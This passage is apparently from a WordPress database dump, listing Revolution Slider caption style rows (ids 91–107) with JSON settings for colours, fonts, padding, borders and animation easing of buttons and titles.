0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(91,'.tp-caption.MarkerStyle','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"text-align\":\"left\",\"0\":\"\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"\\\"Permanent Marker\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(92,'.tp-caption.Gym-Menuitem','{\"hover\":\"true\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(93,'.tp-caption.Newspaper-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#FFFFFF\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"13px\",\"line-height\":\"17px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(94,'.tp-caption.Newspaper-Subtitle','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#a8d8ee\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(95,'.tp-caption.Newspaper-Title','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(96,'.tp-caption.Newspaper-Title-Centered','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"center\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(97,'.tp-caption.Hero-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(98,'.tp-caption.Video-Title','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(99,'.tp-caption.Video-SubTitle','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"12px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.35\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(100,'.tp-caption.NotGeneric-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(101,'.tp-caption.NotGeneric-BigButton','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"27px\",\"30px\",\"27px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(102,'.tp-caption.WebProduct-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#333333\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"48px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0px\",\"40px\",\"0px\",\"40px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(103,'.tp-caption.Restaurant-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffe081\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#0a0a0a\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(104,'.tp-caption.Gym-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#8bc027\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(105,'.tp-caption.Gym-Button-Light','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"0\",\"border-color\":\"#8bc027\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power2.easeInOut\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(106,'.tp-caption.Sports-Button-Light','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(107,'.tp-caption.Sports-Button-Red','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"Linear.easeNone\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"